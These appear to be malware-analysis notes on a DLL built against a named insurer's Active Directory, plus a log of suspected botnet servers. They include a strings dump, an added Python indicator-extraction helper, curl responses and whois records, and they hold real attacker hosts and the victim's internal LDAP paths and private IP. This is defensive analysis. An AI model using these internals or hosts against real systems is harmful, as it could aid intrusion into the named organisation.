SHA256 Hash: de106db86e26b873be1611b5b7fa2ec4113044bef7dfafb2a6f557fa752d8c3c

File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

VirusTotal First Spotted: 2021-12-02 21:51:07 UTC

https://www.virustotal.com/gui/file/de106db86e26b873be1611b5b7fa2ec4113044bef7dfafb2a6f557fa752d8c3c

Strings from inside:

cisco
FFDDADADACACACACACACACACACABN
SMB%
\MAILSLOT\BROWSE
PDM000900-V7388
scaneo de VDI
pdm000900-v1763
mapfre
MSFT 5.0
'_discovery20081
prop.key.msg_type
#prop.val.rply.p2p.content_discovery
pdm000900-v1717<
MSFT 5.07
</head><body>
<h1>Not Found</h1>
<p>The requested URL /wpad.dat was not found on this server.</p>
<hr>
<address>Apache/2.2.15 (Oracle) Server at 10.231.177.21 Port 80</address>
</body></html>
0273740
name1
VirtualesPDM0
objectGUID1
objectCategory1
BCN=Organizational-Unit,CN=Schema,CN=Configuration,DC=mapfre,DC=net0
gPLink1
[LDAP://cn={68D681C2-6B9B-4751-B74A-A0CE85A62686},cn=policies,cn=system,DC=es,DC=mapfre,DC=net;0][LDAP://cn={F833F8E0-5756-4715-B2A4-A66A09951C53},cn=policies,cn=system,DC=es,DC=mapfre,DC=net;0][LDAP://cn={34C5D7E9-7B59-4F93-A24C-DDEB1AB0223A},cn=policies,cn=system,DC=es,DC=mapfre,DC=net;0][LDAP://cn={9C943BCF-0686-4064-B3FE-6F1593EBFF0A},cn=policies,cn=system,DC=es,DC=mapfre,DC=net;0][LDAP://cn={22A49EF3-1C54-41B8-BA4D-B1C25B8F869E},cn=policies,cn=system,DC=es,DC=mapfre,DC=net;0]0

As you can see, this is a very specific LDAP string (“es.mapfre.net”). Browsing to “mapfre.net” redirects to “mapfre.com”, with Spanish as the default language, so it’s likely a directly targeted LDAP attack of some kind on them. I’m assuming this already swung around to their attention given they’ve moved entirely off the mapfre.net domain, but who knows what their internal LDAP structure is like (those are hard to migrate due to internal applications…). I’m sure whatever vulnerability this exploits has been addressed, though.

The embedded 404 response referencing 10.231.177.21 makes me think it poses as an HTTP server. This attack has quite a large quantity of knowledge about the internal structure of their enterprise architecture.
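To pull out the facts these notes draw from the strings dump (the targeted AD domain from the DC= components, the Group Policy GUIDs in the gPLink value, and the private address in the embedded 404 page), here is an added Python triage helper. It is not code from these notes; the SAMPLE_STRINGS list is constructed from the excerpt above, and the regexes are this example's own.

```python
"""Triage Active Directory facts out of `strings` output from a suspicious PE.

Added example, not code from the honeypot notes. Given a list of printable
strings it reports the DNS domains implied by LDAP distinguished names, the
Group Policy GUIDs referenced in gPLink-style values, and any RFC 1918
addresses embedded in the binary.
"""
import ipaddress
import re

# Constructed sample: a subset of the strings shown in the notes above.
SAMPLE_STRINGS = [
    "cisco",
    "SMB%",
    "\\MAILSLOT\\BROWSE",
    "PDM000900-V7388",
    "mapfre",
    "MSFT 5.0",
    "<address>Apache/2.2.15 (Oracle) Server at 10.231.177.21 Port 80</address>",
    "BCN=Organizational-Unit,CN=Schema,CN=Configuration,DC=mapfre,DC=net0",
    "gPLink1",
    "[LDAP://cn={68D681C2-6B9B-4751-B74A-A0CE85A62686},cn=policies,cn=system,DC=es,DC=mapfre,DC=net;0]"
    "[LDAP://cn={F833F8E0-5756-4715-B2A4-A66A09951C53},cn=policies,cn=system,DC=es,DC=mapfre,DC=net;0]"
    "[LDAP://cn={34C5D7E9-7B59-4F93-A24C-DDEB1AB0223A},cn=policies,cn=system,DC=es,DC=mapfre,DC=net;0]"
    "[LDAP://cn={9C943BCF-0686-4064-B3FE-6F1593EBFF0A},cn=policies,cn=system,DC=es,DC=mapfre,DC=net;0]"
    "[LDAP://cn={22A49EF3-1C54-41B8-BA4D-B1C25B8F869E},cn=policies,cn=system,DC=es,DC=mapfre,DC=net;0]0",
]

# An LDAP path runs until the ';' link-option separator or the closing ']'.
LDAP_PATH = re.compile(r"LDAP://([^;\]]+)", re.IGNORECASE)
DC_COMPONENT = re.compile(r"DC=([^,]+)", re.IGNORECASE)
GUID = re.compile(r"\{([0-9A-F]{8}-(?:[0-9A-F]{4}-){3}[0-9A-F]{12})\}", re.IGNORECASE)
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def ldap_domains(strings):
    """DNS domains implied by the DC= components of every LDAP:// path.

    Only delimited paths are used on purpose: `strings` glues adjacent
    binary bytes onto undelimited DNs (the 'DC=net0' line above), and
    trusting those would yield a bogus domain.
    """
    domains = set()
    for s in strings:
        for path in LDAP_PATH.findall(s):
            labels = DC_COMPONENT.findall(path)
            if labels:
                domains.add(".".join(labels).lower())
    return sorted(domains)


def gpo_guids(strings):
    """GUIDs of the Group Policy objects named in gPLink-style values, in order."""
    seen = []
    for s in strings:
        for guid in GUID.findall(s):
            guid = guid.upper()
            if guid not in seen:
                seen.append(guid)
    return seen


def private_ips(strings):
    """RFC 1918 / loopback / link-local IPv4 addresses embedded in the strings."""
    found = set()
    for s in strings:
        for candidate in IPV4.findall(s):
            try:
                addr = ipaddress.ip_address(candidate)
            except ValueError:  # e.g. an octet above 255 or a version string
                continue
            if addr.is_private:
                found.add(str(addr))
    return sorted(found)


def triage(strings):
    """One dict with the three AD indicators, ready to paste into a report."""
    return {
        "domains": ldap_domains(strings),
        "gpo_guids": gpo_guids(strings),
        "private_ips": private_ips(strings),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_STRINGS).items():
        print(f"{key}: {value}")
```

Run against the real `strings` output rather than the excerpt, the domain list is the quickest way to tell a generic LDAP-probing sample from one built for a single victim: a generic tool yields no delimited DNs at all, while a targeted one yields exactly one.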

jx.qingdaosheng.com

$ curl -i jx.qingdaosheng.com
HTTP/1.1 200 OK
Date: Tue, 10 May 2022 18:54:28 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Wed, 13 Apr 2022 12:35:57 GMT
ETag: "0-5dc886b50fe98"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
jx.qingdaosheng.com.	154	IN	A	156.234.211.155
Self Rep Fucking NeTiS and Thisity 0n Ur FuCkInG FoReHeAd We BiG L33T HaxErS
unstable_is_the_history_of_universe

2.56.57.98

GOLDFISHGANG
inetnum:        2.56.56.0 - 2.56.57.255
netname:        SERVER-2-56-56-0
country:        NL
org:            ORG-SB666-RIPE
admin-c:        SBAH21-RIPE
tech-c:         SBAH21-RIPE
status:         ASSIGNED PA
mnt-by:         PREFIXBROKER-MNT
created:        2021-05-03T18:09:59Z
last-modified:  2021-05-03T18:09:59Z
source:         RIPE

organisation:   ORG-SB666-RIPE
org-name:       Serverion BV
org-type:       OTHER
address:        Krammer 8
address:        3232HE Brielle
address:        Netherlands
abuse-c:        SBAH21-RIPE
mnt-ref:        PREFIXBROKER-MNT
mnt-by:         PREFIXBROKER-MNT
created:        2021-05-03T18:09:58Z
last-modified:  2021-05-03T18:09:58Z
source:         RIPE # Filtered

v1.kannimanelaji.com

v1.kannimanelaji.com.	600	IN	A	156.226.173.28
$ curl -i v1.kannimanelaji.com
HTTP/1.1 200 OK
Date: Fri, 13 May 2022 06:08:03 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Tue, 10 May 2022 15:22:55 GMT
ETag: "0-5dea9e625c6c5"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8

156.226.173.28

inetnum:        156.226.173.0 - 156.226.173.255
netname:        ICIDC_Limited
descr:          ICIDC Limited
country:        HK
admin-c:        CIS1-AFRINIC
tech-c:         CIS1-AFRINIC
status:         ASSIGNED PA
mnt-by:         CIL1-MNT
source:         AFRINIC # Filtered
parent:         156.224.0.0 - 156.255.255.255

person:         Cloud Innovation Support
address:        Ebene
address:        MU
address:        Mahe
address:        Seychelles
phone:          tel:+248-4-610-795
nic-hdl:        CIS1-AFRINIC
abuse-mailbox:  abuse@cloudinnovation.org
mnt-by:         CIL1-MNT
source:         AFRINIC # Filtered
$ curl -i http://156.226.173.28
HTTP/1.1 200 OK
Date: Fri, 13 May 2022 06:06:35 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Tue, 10 May 2022 15:22:55 GMT
ETag: "0-5dea9e625c6c5"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8

104.168.46.103

lzrd cock fest"/proc/"/exe
$ curl -i http://104.168.46.103/
HTTP/1.1 200 OK
Date: Fri, 13 May 2022 22:06:42 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 12 May 2022 19:38:40 GMT
ETag: "eb-5ded5b479d753"
Accept-Ranges: bytes
Content-Length: 235
Content-Type: text/html; charset=UTF-8

<html>
 <body>
 <title>EAT MY BINS :)</title>
  <p><img src="bins.jpg"
  width = "1000"
  height = "500" </p>

 <audio src="meme1.mp3" controls autoplay />
 <body style="background-color:green">

</html>
</body>
</html>

Image is here: